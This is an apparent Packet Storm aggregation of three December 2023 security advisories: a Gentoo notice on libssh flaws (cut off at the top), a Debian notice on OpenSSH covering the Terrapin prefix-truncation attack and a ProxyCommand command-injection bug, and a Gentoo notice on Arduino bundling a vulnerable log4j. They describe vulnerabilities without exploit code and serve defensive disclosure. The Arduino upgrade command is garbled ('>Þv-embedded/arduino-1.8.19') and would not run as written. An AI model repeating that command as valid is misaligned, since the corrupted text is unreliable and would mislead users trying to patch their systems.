     Bugs: #810517, #905746  
       ID: 202312-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in libssh, the worst of  
which could lead to remote code execution.

Background  
=========  
libssh is a multiplatform C library implementing the SSHv2 protocol on  
client and server side.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-libs/libssh  < 0.10.5      >= 0.10.5

Description  
==========  
Multiple vulnerabilities have been discovered in libssh. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libssh users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/libssh-0.10.5"

References  
=========  
[ 1 ] CVE-2021-3634  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3634  
[ 2 ] CVE-2023-1667  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1667  
[ 3 ] CVE-2023-2283  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2283  
[ 4 ] GHSL-2023-085

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-05

Debian Linux Security Advisory 5586-1 - Several vulnerabilities have been discovered in OpenSSH, an implementation of the SSH protocol suite.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5586-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 22, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssh  
CVE ID         : CVE-2021-41617 CVE-2023-28531 CVE-2023-48795 CVE-2023-51384  
                 CVE-2023-51385  
Debian Bug     : 995130 1033166

Several vulnerabilities have been discovered in OpenSSH, an  
implementation of the SSH protocol suite.

CVE-2021-41617

    It was discovered that sshd failed to correctly initialise  
    supplemental groups when executing an AuthorizedKeysCommand or  
    AuthorizedPrincipalsCommand, where a AuthorizedKeysCommandUser or  
    AuthorizedPrincipalsCommandUser directive has been set to run the  
    command as a different user. Instead these commands would inherit  
    the groups that sshd was started with.

CVE-2023-28531

    Luci Stanescu reported that a error prevented constraints being  
    communicated to the ssh-agent when adding smartcard keys to the  
    agent with per-hop destination constraints, resulting in keys being  
    added without constraints.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

CVE-2023-51384

    It was discovered that when PKCS#11-hosted private keys were  
    added while specifying destination constraints, if the PKCS#11  
    token returned multiple keys then only the first key had the  
    constraints applied.

CVE-2023-51385

    It was discovered that if an invalid user or hostname that contained  
    shell metacharacters was passed to ssh, and a ProxyCommand,  
    LocalCommand directive or "match exec" predicate referenced the user  
    or hostname via expansion tokens, then an attacker who could supply  
    arbitrary user/hostnames to ssh could potentially perform command  
    injection. The situation could arise in case of git repositories  
    with submodules, where the repository could contain a submodule with  
    shell characters in its user or hostname.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:8.4p1-5+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:9.2p1-2+deb12u2.

We recommend that you upgrade your openssh packages.

For the detailed security status of openssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWFTwlfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S6PRAAkBJzc/CFQgXLtms7bom/Vw750vvqEVhj7ojOPHbmpoppVIjFR768C5Z6  
AO5HiP/uH1tk0x2zejbPhXRgLK/2PEuCTA/4w7UeTzYIGve3IVKVgNs+/sgWQBuK  
M1xj8zL1PLkRi6rSXAvGpTxqdCtWC61AWHOl1Q03w3usilETJKDsulOBb9sQ9Uid  
xSRxDUAS//gyRdW+K3D9HsPYJAW/oSu4tJO+UXI1WJTDY1N/i0cq7yH16YXzbEcV  
dhttLyR5fWx000fSsaaWXgYUS2sSYUfOKPfw4xdePpdeBYNumnpehjfCED5C61EQ  
os4uvEDi15X8M599/+u0oLVJJFXVSfZ4W1ecFWcFAvMny70F0s1a7AxQCcN3sXkt  
kLAuOXJHmmhBeqSj1kVKoLcg4WSlCdglRr6KgiXqUVvfUBsWhseoyGJ3jST3PQcZ  
70/lIJofavLJdFQHlPTXs7lDnFttgzuB3xE5wM7TeXs5L2l9QI0W64YCtWthqApL  
c7KjPGmAx7xYOOp+aHclsP74nBVZs6tcvHPf9Y/1OK30XkoMbuW0+oH1rCu6EGs0  
F6Th1FneTwRN2NEhzpQMr+34m0T8H7oymiQmi9C+ZDhCBDRcpN4sATYNh70Y/t6y  
i8k/vZcCCfLxQgdiay5JJCWJPf1pvvmPbgMLs4WVELr/6E9xIR0=2W//  
-----END PGP SIGNATURE-----

Debian Security Advisory 5586-1

Gentoo Linux Security Advisory 202312-4 - A vulnerability has been found in Arduino which bundled a vulnerable version of log4j. Versions greater than or equal to 1.8.19 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Arduino: Remote Code Execution  
     Date: December 22, 2023  
     Bugs: #830716  
       ID: 202312-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in Arduino which bundled a vulnerable  
version of log4j.

Background  
=========  
Arduino is an open-source AVR electronics prototyping platform.

Affected packages  
================  
Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-embedded/arduino  < 1.8.19      >= 1.8.19

Description  
==========  
A vulnerability has been discovered in Arduino. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
Arduino bundles a vulnerable version of log4j that may lead to remote  
code execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Arduino users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-embedded/arduino-1.8.19"

References  
=========  
[ 1 ] CVE-2021-4104  
      https://nvd.nist.gov/vuln/detail/CVE-2021-4104

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-04

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm